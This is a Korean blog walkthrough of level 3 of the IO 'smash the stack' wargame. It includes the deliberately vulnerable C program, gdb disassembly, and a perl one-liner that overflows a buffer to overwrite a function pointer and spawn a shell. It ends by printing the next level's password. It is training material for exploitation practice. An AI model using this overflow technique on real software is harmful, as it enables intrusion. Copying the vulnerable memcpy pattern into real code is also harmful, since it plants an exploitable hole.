summary: simple bof
level3@io:/levels$ cat level03.c
//bla, based on work by beach
#include <stdio.h>
#include <string.h>
void good()
{
puts("Win.");
execl("/bin/sh", "sh", NULL);
}
void bad()
{
printf("I'm so sorry, you're at %p and you want to be at %p\n", bad, good);
}
int main(int argc, char **argv, char **envp)
{
void (*functionpointer)(void) = bad;
char buffer[50];
if(argc != 2 || strlen(argv[1]) < 4)
return 0;
memcpy(buffer, argv[1], strlen(argv[1]));
memset(buffer, 0, strlen(argv[1]) - 4);
printf("This is exciting we're going to %p\n", functionpointer);
functionpointer();
return 0;
}
소스를 보면 buffer아래에 functionpointer가 선언되어있고 overflow시켜 functionpointer를 good의 주소로 바꿔주면 된다.
(gdb) info func
All defined functions:
Non-debugging symbols:
0x0804830c _init
0x0804834c __gmon_start__
0x0804834c __gmon_start__@plt
0x0804835c memset
0x0804835c memset@plt
0x0804836c __libc_start_main
0x0804836c __libc_start_main@plt
0x0804837c execl
0x0804837c execl@plt
0x0804838c memcpy
0x0804838c memcpy@plt
0x0804839c strlen
0x0804839c strlen@plt
0x080483ac printf
0x080483ac printf@plt
0x080483bc puts
0x080483bc puts@plt
0x080483d0 _start
0x08048400 __do_global_dtors_aux
0x08048440 frame_dummy
0x08048474 good
0x080484a4 bad
0x080484c8 main
0x08048580 __libc_csu_fini
0x08048590 __libc_csu_init
0x080485ea __i686.get_pc_thunk.bx
0x080485f0 __do_global_ctors_aux
0x08048620 _fini
0x080484c8 <+0>: push ebp
0x080484c9 <+1>: mov ebp,esp
0x080484cb <+3>: sub esp,0x78
0x080484ce <+6>: and esp,0xfffffff0
0x080484d1 <+9>: mov eax,0x0
0x080484d6 <+14>: sub esp,eax
0x080484d8 <+16>: mov DWORD PTR [ebp-0xc],0x80484a4
0x080484df <+23>: cmp DWORD PTR [ebp+0x8],0x2
0x080484e3 <+27>: jne 0x80484fc <main+52>
0x080484e5 <+29>: mov eax,DWORD PTR [ebp+0xc]
0x080484e8 <+32>: add eax,0x4
0x080484eb <+35>: mov eax,DWORD PTR [eax]
0x080484ed <+37>: mov DWORD PTR [esp],eax
0x080484f0 <+40>: call 0x804839c <strlen@plt>
0x080484f5 <+45>: cmp eax,0x3
0x080484f8 <+48>: jbe 0x80484fc <main+52>
0x080484fa <+50>: jmp 0x8048505 <main+61>
0x080484fc <+52>: mov DWORD PTR [ebp-0x5c],0x0
0x08048503 <+59>: jmp 0x8048579 <main+177>
0x08048505 <+61>: mov eax,DWORD PTR [ebp+0xc]
0x08048508 <+64>: add eax,0x4
0x0804850b <+67>: mov eax,DWORD PTR [eax]
0x0804850d <+69>: mov DWORD PTR [esp],eax
0x08048510 <+72>: call 0x804839c <strlen@plt>
0x08048515 <+77>: mov DWORD PTR [esp+0x8],eax
0x08048519 <+81>: mov eax,DWORD PTR [ebp+0xc]
0x0804851c <+84>: add eax,0x4
0x0804851f <+87>: mov eax,DWORD PTR [eax]
0x08048521 <+89>: mov DWORD PTR [esp+0x4],eax
0x08048525 <+93>: lea eax,[ebp-0x58]
0x08048528 <+96>: mov DWORD PTR [esp],eax
0x0804852b <+99>: call 0x804838c <memcpy@plt>
0x08048530 <+104>: mov eax,DWORD PTR [ebp+0xc]
0x08048533 <+107>: add eax,0x4
0x08048536 <+110>: mov eax,DWORD PTR [eax]
0x08048538 <+112>: mov DWORD PTR [esp],eax
0x0804853b <+115>: call 0x804839c <strlen@plt>
0x08048540 <+120>: sub eax,0x4
0x08048543 <+123>: mov DWORD PTR [esp+0x8],eax
0x08048547 <+127>: mov DWORD PTR [esp+0x4],0x0
0x0804854f <+135>: lea eax,[ebp-0x58]
0x08048552 <+138>: mov DWORD PTR [esp],eax
0x08048555 <+141>: call 0x804835c <memset@plt>
0x0804855a <+146>: mov eax,DWORD PTR [ebp-0xc]
0x0804855d <+149>: mov DWORD PTR [esp+0x4],eax
0x08048561 <+153>: mov DWORD PTR [esp],0x80486c0
0x08048568 <+160>: call 0x80483ac <printf@plt>
0x0804856d <+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <+168>: call eax
0x08048572 <+170>: mov DWORD PTR [ebp-0x5c],0x0
0x08048579 <+177>: mov eax,DWORD PTR [ebp-0x5c]
0x0804857c <+180>: leave
0x0804857d <+181>: ret
level3@io:/levels$ ./level03 `perl -e 'print "a"x76,"\x74\x84\x04\x08"'`
This is exciting we're going to 0x8048474
Win.
sh-4.2$ cat /home/level4/.pass
9C4Jxjc3O3IjB7nXej
'wargame > IO smash the stack' 카테고리의 다른 글
| level5 (0) | 2014.05.27 |
|---|---|
| level4 (0) | 2014.05.27 |
| level2_alt (0) | 2014.05.27 |
| level2 (0) | 2014.05.12 |
| level1을 풀다가 생긴 의문점에 대한 분석 (0) | 2014.05.12 |